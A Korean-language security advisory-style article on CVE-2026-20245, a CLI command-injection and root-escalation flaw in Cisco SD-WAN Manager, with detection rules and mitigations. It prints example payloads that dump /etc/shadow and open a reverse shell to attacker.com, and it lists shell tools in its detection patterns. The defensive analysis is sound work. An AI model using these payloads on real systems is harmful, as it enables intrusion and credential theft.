Cisco SD-WAN Manager CLI 검증 우회와 루트 권한 상승 대응

CVE-2026-20245의 Cisco Catalyst SD-WAN Manager CLI 입력 검증 우회, 루트 권한 상승 경로와 미패치 완화 조치를 다룬다.

2026-08-14 · 최초 발행 2026-08-02

2026년 6월 발견된 CVE-2026-20245는 Cisco Catalyst SD-WAN Manager의 CLI 입력 검증 결함을 통해 저권한 계정이 OS root 권한까지 도달할 수 있는 미패치 제로데이다. 관리 평면은 SD-WAN 토폴로지와 인증서, VPN 설정을 다루므로 이 경로가 악용되면 단일 장비의 권한 상승으로 끝나지 않는다.

이 취약점은 CLI 처리 구조, 관리 평면 접근 통제, 탐지 체계, 패치가 나오기 전의 임시 완화 조치를 함께 검토해야 하는 사례다.

CLI 처리 경로에서 발생하는 명령 인젝션

CVE-2026-20245는 Cisco Catalyst SD-WAN Manager(구 Cisco vManage)의 CLI 처리 모듈에 있는 OS 명령 인젝션 계열 입력 검증 취약점이다. CLI 명령을 파싱하는 과정에서 $(), `, |, ;, && 등의 특수 문자와 메타문자에 대한 이스케이프 처리가 빠져 있고, 입력값이 시스템 호출(syscall) 또는 쉘 인터프리터로 전달된다.

영향 컴포넌트는 SD-WAN Manager의 viptela-cli 데몬이다. 이 데몬은 CLI 세션으로 들어온 명령을 파싱한 뒤 Python subprocess 또는 bash 쉘 호출을 통해 시스템 명령을 실행한다. shlex.quote() 또는 이에 준하는 인자 분리 처리가 적용되지 않은 것이 인젝션 벡터를 만든다.

문제는 다음 결함이 한 경로에서 겹친다는 데 있다.

  • CWE-78(OS Command Injection): 외부 입력이 OS 명령으로 직접 전달됨
  • CWE-269(Improper Privilege Management): viptela-cli 데몬이 루트 권한(UID=0)으로 실행됨
  • CWE-20(Improper Input Validation): CLI 레이어에서 메타문자 필터링 부재
항목 세부 정보
CVE ID CVE-2026-20245
CVSS v3.1 Score 8.8 (High)
CVSS 벡터 AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H
CWE CWE-78, CWE-269, CWE-20
영향 제품 Cisco Catalyst SD-WAN Manager
영향 버전 20.9.x ~ 20.14.x (20.15.1 이전)
패치 가용성 미패치 (2026년 6월 기준)
악용 난이도 Low (로컬 CLI 접근 권한만 필요)
공개 PoC 비공개 (제한적 배포)

CVSS 벡터에서 Scope가 Changed(C)인 점도 중요하다. viptela-cli 내부에서 일어난 권한 상승이 SD-WAN Manager OS 전체와 관리 네트워크의 다른 시스템으로 향하는 Lateral Movement로 이어질 수 있음을 뜻한다.

저권한 CLI 세션이 root 컨텍스트에 닿는 경로

공격자 (로컬 CLI 접근 권한보유)초기 접근: 저권한 운영자 계정획득SSH/콘솔 CLI 세션 연결취약 CLI 명령 탐색viptela-cli 파싱 취약점 식별메타문자 포함 페이로드 주입예: show interface $(id)viptela-cli 데몬 처리(UID=0, 입력 검증 없음)OS 명령 실행bash -c '페이로드' (루트컨텍스트)루트 획득SSH 삽입 / 백도어 설치SD-WAN 설정 DB 탈취(viptela-system.db)관리 네트워크 LateralMovement

공격자는 먼저 SD-WAN Manager CLI에 접속할 수 있는 저권한 계정을 확보해야 한다. 피싱이나 크리덴셜 스터핑으로 운영자 자격 증명을 취득할 수 있고, 내부자 또는 하청 업체 직원이 계정을 악용하는 시나리오도 가능하다.

Cisco SD-WAN Manager는 기본 설정에서 netadmin, operator, basic 등 다단계 권한 롤을 제공한다. operator 롤로 특정 show 명령에 접근할 수 있고, 이 접근이 취약점 트리거 벡터가 될 수 있다. VPN 또는 내부 네트워크 접근 권한이 있으면 SSH나 웹 기반 CLI 세션을 열 수 있다.

CVE-2026-20245는 단독으로도 위험하지만 SD-WAN Manager 웹 UI의 인증 우회 취약점, 예를 들어 이전 CVE-2023-20252 계열과 연결되면 원격 비인증 root 권한 상승으로 이어질 수 있다.

취약한 처리 방식은 다음과 같은 형태다.

# 취약 코드 패턴 (의사 코드)
def execute_show_command(interface_name):
    cmd = f"ip link show {interface_name}"
    result = subprocess.run(cmd, shell=True, capture_output=True)
    return result.stdout

shell=True와 f-string 직접 삽입이 함께 쓰이면 사용자 입력이 쉘 명령으로 해석될 수 있다. interface_name 파라미터에는 다음과 같은 페이로드가 들어갈 수 있다.

# 페이로드 예시 1: 서브쉘 인젝션
show interface lo$(id > /tmp/pwn.txt)

# 페이로드 예시 2: 파이프 체인
show interface lo; cat /etc/shadow > /tmp/shadow_dump

# 페이로드 예시 3: 백그라운드 역방향 쉘
show interface lo & bash -i >& /dev/tcp/attacker.com/4444 0>&1

viptela-cli의 입력 검증 레이어는 SQL 인젝션 방어용 키워드 블랙리스트를 보유하지만, $, (, ), ;, &, | 같은 OS 명령 메타문자에는 화이트리스트 기반 검증이 없다. 이 간극이 우회의 구조적 원인이다.

viptela-cli 데몬이 root(UID=0)로 실행되므로 주입된 명령도 root 컨텍스트에서 수행된다. SUID 바이너리 탐색이나 kernel exploit 같은 별도의 권한 상승 절차가 필요하지 않다는 점이 위험도를 키운다.

root 권한을 얻은 뒤에는 다음 행위가 이어질 수 있다.

  • SSH 인가 키 삽입: /root/.ssh/authorized_keys에 공격자 공개키 추가로 영구 백도어 확보
  • 설정 DB 탈취: SD-WAN Manager의 핵심 데이터베이스 viptela-system.db(SQLite)에는 전체 SD-WAN 토폴로지, 기기 인증서, 암호화 키, VPN 설정이 포함됨
  • 인증서 탈취: WAN Edge 라우터 인증에 사용되는 루트 CA 인증서 및 개인키 접근 가능
  • 관리 트래픽 감청: Control Plane 트래픽 미러링 설정을 통해 SD-WAN 전체 통신 감청

관리 평면은 별도 경계로 다뤄야 한다

관리 평면 보안 아키텍처접근 제어 레이어세분화된 RBAC 설계Identity & Access ManagementCLI 접근: 세션 녹화(Session Recording)IdP(Azure AD / Okta)MFA 강제 적용(TOTP / FIDO2)PAM 솔루션(CyberArk / BeyondTrust)Read-Only Operator(show 명령 전용)Network Engineer(설정 변경, CLI 접근)SD-WAN Admin(정책 관리, 감사)Super Admin(시스템 관리, MFA+승인)API 접근: OAuth2 토큰(단기 유효, 스코프 제한) UI: IP 화이트리스트+ Just-in-Time 접근

RBAC 설계에서는 최소 권한(Least Privilege)과 직무 분리(Separation of Duties)를 기준으로 권한을 나눠야 한다. 운영자에게는 show 계열 명령만 허용하고, 시스템 명령 실행 가능성이 있는 debug, request 계열은 차단하는 방식이다. Cisco SD-WAN Manager는 기본 롤 외에 커스텀 피처 템플릿 권한을 지원한다.

PAM을 SD-WAN Manager 앞단에 두면 모든 관리 세션을 프록시하고 녹화할 수 있다. CyberArk 또는 BeyondTrust 같은 솔루션을 통해 세션 전체를 보관하면 취약점 악용 이후의 포렌식 증거 확보와 이상 행위 알림에 활용할 수 있다.

슈퍼 관리자 권한은 평상시 비활성화하고 Change Request가 생성된 경우에만 Just-in-Time 방식으로 부여한다. 접근 유효 시간은 최대 4시간으로 제한하고, 만료되면 자동 회수한다.

관리 평면은 데이터 평면과 분리된 Out-of-Band Management Network에 둬야 한다. 전용 VLAN(Management VLAN) 또는 별도 VRF로 관리 인터페이스를 격리하고 인터넷 직접 노출을 차단한다.

제로트러스트 관점에서는 내부 네트워크에서 들어오는 접근도 재인증 대상이다. SD-WAN Manager 자체를 방화벽 정책으로 격리하고, 허용 포트는 443(웹 UI), 22(SSH 관리), 830(NETCONF), 8443(API)만 명시적으로 열 수 있다. 관리 단말기에는 EDR 에이전트를 설치해 상태를 확인한 뒤 접근시키고, 세션 중에도 연속 인증을 적용해 이상 행위가 감지되면 세션을 종료한다.

CLI와 root 파일 접근을 함께 탐지한다

SIEM에서는 CLI에 들어오는 메타문자와 root 컨텍스트에서 벌어지는 사후 행위를 별도로 관찰해야 한다. 다음은 CVE-2026-20245 악용 시도를 위한 Splunk 및 Microsoft Sentinel 탐지 룰 예시다.

index=cisco_sdwan sourcetype=viptela:cli
| search command IN ("show *", "request *", "debug *")
| regex command=".*[\$\(\)\;\&\|\`].*"
| stats count by src_user, src_ip, command, _time
| where count > 0
| eval risk_score=case(
    match(command, "bash|sh|python|perl|nc|curl|wget"), 90,
    match(command, "\$\(|\`"), 75,
    match(command, ";\s*(cat|rm|cp|mv|chmod)"), 80,
    true(), 60
  )
| where risk_score >= 60
| table _time, src_user, src_ip, command, risk_score
| sort -risk_score
index=cisco_sdwan_syslog host=sdwan-manager*
| search (process="bash" OR process="sh") uid=0
| search (file_path="/root/.ssh/*" OR file_path="/etc/shadow" OR
          file_path="*viptela-system.db*" OR file_path="/etc/cron*")
| eval alert_type="PostExploitation_RootFileAccess"
| table _time, host, process, uid, file_path, alert_type
CiscoSDWAN_CL
| where EventType == "CLI_COMMAND"
| where Command has_any ("$(", "`", "&&", "||", ";bash", ";sh", "|nc", ">/dev/tcp")
| summarize
    CommandCount = count(),
    Commands = make_set(Command),
    FirstSeen = min(TimeGenerated),
    LastSeen = max(TimeGenerated)
  by UserName, SourceIP, bin(TimeGenerated, 5m)
| where CommandCount >= 1
| extend AlertSeverity = "High"
| extend AlertName = "CVE-2026-20245 CLI Injection Attempt"
| project TimeGenerated, UserName, SourceIP, CommandCount, Commands, AlertSeverity, AlertName

탐지 대상은 CLI 명령만이 아니다. root 프로세스 생성, 민감 파일 접근, 관리 서버의 외부 연결까지 함께 봐야 한다.

탐지 시나리오 탐지 방법 임계값
CLI 명령 내 특수 문자 정규식 패턴 매칭 단 1회 즉시 알림
루트 프로세스 신규 생성 프로세스 트리 모니터링 viptela-cli 하위 bash 생성 시
외부 IP 네트워크 연결 네트워크 플로우 분석 SD-WAN Manager에서 미허용 외부 IP 접속
SSH authorized_keys 변경 파일 무결성 모니터링(FIM) 단 1회 즉시 알림
DB 파일 대량 접근 파일 접근 로그 60초 내 100회 이상 읽기

패치가 나오기 전 관리 접근면 줄이기

패치가 제공되지 않은 상태에서 바로 적용할 수 있는 조치는 SD-WAN Manager에 닿을 수 있는 IP 범위를 최소화하는 것이다. 다음 ACL은 보안 관제 서버와 관리용 점프서버, 모니터링 시스템만 관리 인터페이스에 접근하도록 제한한다.

! Cisco IOS XE - SD-WAN Manager 관리 인터페이스 ACL 예시
!
ip access-list extended ACL_SDWAN_MGT_RESTRICT
 ! 허용: 보안 관제 서버 (SIEM, PAM)
 permit tcp 10.1.100.0 0.0.0.255 host 10.200.1.10 eq 22
 permit tcp 10.1.100.0 0.0.0.255 host 10.200.1.10 eq 443
 permit tcp 10.1.100.0 0.0.0.255 host 10.200.1.10 eq 8443
 ! 허용: 네트워크 관리 전용 점프서버
 permit tcp host 10.1.50.10 host 10.200.1.10 eq 22
 permit tcp host 10.1.50.10 host 10.200.1.10 eq 443
 ! 허용: 모니터링 시스템 SNMP
 permit udp 10.1.100.0 0.0.0.255 host 10.200.1.10 eq 161
 ! 차단: 그 외 모든 트래픽
 deny   ip any host 10.200.1.10 log
!
interface GigabitEthernet0/0/1
 description SD-WAN Manager Management Interface
 ip access-group ACL_SDWAN_MGT_RESTRICT in

SD-WAN Manager 서버의 Linux 방화벽(iptables/nftables)에도 동일한 화이트리스트 정책을 중복 적용하는 심층 방어(Defense in Depth) 구성이 필요하다.

Cisco PSIRT가 보안 권고를 발행할 때는 현재 버전과 영향 범위를 우선 확인한다. show version으로 영향 버전인 20.9.x~20.14.x 여부를 판단할 수 있다.

vManage# show version
Cisco Catalyst SD-WAN Manager Software Version: 20.12.3

PSIRT 권고의 Workarounds 섹션에 CLI 명령 제한 설정이 제시되면 적용하고, 적용 후에도 SIEM 모니터링을 강화해야 한다. Cisco PSIRT 공식 채널(psirt.cisco.com) 및 ICS-CERT 알림을 구독해 패치가 제공되면 업그레이드 절차를 진행한다. 패치 이전의 추가 완화 조치는 Cisco TAC 케이스를 열어 확인하고 Software Maintenance Upgrade(SMU)를 통한 핫픽스 적용 가능성을 문의한다.

다음은 CLI 디버그 명령을 비활성화하는 SD-WAN Manager 설정 예시다.

! SD-WAN Manager 설정 예시: CLI 디버그 명령 비활성화
system
 no cli-limit-override
 aaa
  usergroup operator
   task read system
   task read interface
   no task debug
   no task request-system

viptela-cli가 root 권한으로 실행되는 구조 자체를 줄이는 방안도 검토 대상이다. 전용 비특권 서비스 계정, 예를 들어 viptela-svc, UID=1001로 데몬을 실행하고 Linux Capabilities로 CAP_NET_ADMIN, CAP_SYS_PTRACE 등 필요한 capability만 부여하는 방식이 있다. 다만 패치 전 임의 변경은 서비스 불안정을 초래할 수 있으므로 Cisco TAC 지원 하에 수행해야 한다.

AppArmor 또는 SELinux로 viptela-cli에 강제 접근 통제(MAC) 정책을 적용하고, /etc, /root 같은 민감 디렉터리를 읽기 전용으로 마운트하는 방법도 방어 계층이 될 수 있다.

공급업체 패치 책임을 계약에 반영하기

SD-WAN처럼 핵심 네트워크 인프라에 해당하는 제품은 조달 단계에서 패치 SLA를 계약에 넣는 방식을 검토할 수 있다.

제 X조 (보안 취약점 대응 의무)

① 공급업체는 CVSS v3.1 기준 다음 기간 내 보안 패치를 제공하여야 한다:
   - Critical (9.0~10.0): 영업일 기준 3일 이내
   - High (7.0~8.9): 영업일 기준 14일 이내
   - Medium (4.0~6.9): 영업일 기준 30일 이내
   - Low (0.1~3.9): 영업일 기준 90일 이내

② 패치 제공이 불가한 경우, 공급업체는 다음을 의무적으로 제공하여야 한다:
   a) 공식 임시 완화 조치(Workaround) 문서 (CVSS High 이상: 48시간 이내)
   b) 예상 패치 제공 일정 (주 단위 업데이트)
   c) 위험 수용 가능 여부에 대한 기술적 평가 보고서

③ 미패치 상태가 SLA를 초과하는 경우:
   a) 계약금액의 X%에 해당하는 지체 배상금 부과
   b) 고객의 계약 조기 해지권 행사 가능
   c) 대체 솔루션 전환 비용을 공급업체가 부담

④ 정기 취약점 보고 의무:
   - 분기별 제품 보안 현황 보고서 제출
   - NVD/PSIRT 발행 CVE 중 영향 제품에 대한 즉시 통보

주요 SD-WAN 관리 플랫폼의 보안 구조

비교 항목 Cisco Catalyst SD-WAN VMware VeloCloud Fortinet SD-WAN
관리 플랫폼 SD-WAN Manager (vManage) VeloCloud Orchestrator FortiManager + SD-WAN 오버레이
관리 플랫폼 배포 방식 On-Prem / Cloud Cloud-Native SaaS 우선 On-Prem / Cloud / MSSP
CLI 보안 viptela-cli (CVE-2026-20245 영향) 웹 UI 중심, CLI 최소화 FortiOS CLI (감사 로그 강화)
인증 방식 로컬 + RADIUS/TACACS+ + SAML SAML 2.0 + SSO (VeloCloud Orchestrator) FortiAuthenticator + SAML/LDAP
MFA 지원 SAML 연계로 지원 (직접 MFA 미내장) SSO 연계 MFA (Okta, Azure AD) FortiToken 내장 MFA
RBAC 세분화 피처 기반 롤 + 커스텀 오퍼레이터/비즈니스 스페셜리스트/슈퍼유저 관리자 프로파일 + ADOM 기반
API 보안 REST API + OAuth2 토큰 REST API + API 키 REST API + FortiToken
로그 및 감사 외부 Syslog + Cisco vAnalytics VCO 내부 감사 + SIEM 연계 FortiAnalyzer 연계 (통합 SIEM)
암호화 (Control Plane) DTLS 1.2 / TLS 1.3 SSL/TLS (VCO ↔ Edge) DTLS 1.2 / TLS 1.3
암호화 (Data Plane) IPsec (AES-256-GCM) AES 256-bit (VPN 오버레이) IPsec (AES-256-GCM)
제로트러스트 통합 Cisco SASE (Umbrella 연계) VMware SASE (Zscaler 파트너십) Fortinet SASE (FortiSASE)
취약점 이력 (주요) CVE-2023-20252, CVE-2026-20245 CVE-2023-20219 (VCO RCE) CVE-2022-42471 (FortiOS CLI)
패치 대응 속도 PSIRT 기준 Critical 7일 VMware VCSA 패치 주기와 연동 FortiGuard Labs, Critical 24~48시간
정보관리기술사 시험 관련성 SD-WAN 관리 평면 보안, CVE 분석 클라우드 네이티브 SD-WAN UTM/NGFW와 SD-WAN 통합

VMware VeloCloud는 클라우드 네이티브 SaaS 형태여서 관리 플랫폼 보안 책임이 공급업체에 있으며 패치 적용 지연 리스크가 낮다. Fortinet SD-WAN은 UTM 기반 보안과의 통합, FortiGuard의 빠른 패치 대응이 특징이다. Cisco SD-WAN은 엔터프라이즈 규모와 생태계 통합이 강점이지만, On-Prem 관리 플랫폼을 직접 운영할 경우 취약점 관리 책임이 고객에게 있다.

취약점 대응 체계에 연결되는 운영 항목

CVE-2026-20245 대응은 취약점 관리와 접근 통제, 심층 방어, 제로트러스트, 사고 대응 절차가 만나는 지점에 있다.

취약점 관리에서는 CVE/CVSS 체계와 취약점 스캐닝, 식별→평가→우선순위화→패치 적용→검증의 패치 관리 프로세스가 필요하다. 접근 통제에서는 DAC(임의적 접근 통제), MAC(강제적 접근 통제), RBAC(역할 기반 접근 통제)의 차이를 관리 평면에 적용해야 한다. RBAC은 역할, 권한, 주체의 관계를 바탕으로 권한을 구성한다.

ACL, PAM, FIM, SIEM을 중첩 적용하는 것은 경계 보안, 네트워크 분리, 호스트 보안, 애플리케이션 보안, 데이터 보안으로 이어지는 심층 방어 사례가 된다. NIST SP 800-207의 묵시적 신뢰 금지, 최소 권한, 지속 검증 원칙은 SD-WAN 관리 평면 제로트러스트 설계에 적용할 수 있다.

미패치 제로데이가 발견되면 즉각적인 봉쇄 조치와 Cisco PSIRT 신고 절차도 사고 대응 계획에 포함돼야 한다. NIST SP 800-61의 준비→탐지·분석→봉쇄·제거·복구→사후 활동 절차는 이 대응을 운영 프로세스로 정리하는 기준이 된다.

SD-WAN 관리 평면은 WAN 인프라의 제어 지점이다. CVE-2026-20245처럼 저권한 CLI 접근이 root 권한 실행으로 연결되는 경우에는 관리망 노출을 줄이고, 권한을 세분화하며, 세션과 사후 행위를 관찰하는 통제를 동시에 적용해야 한다. 패치가 없는 동안에는 접근 제어 강화, RBAC 세분화, 이상 행위 모니터링이 방어선이 된다.

Sources

Cisco SD-WANCVE-2026-20245권한 상승제로트러스트취약점 관리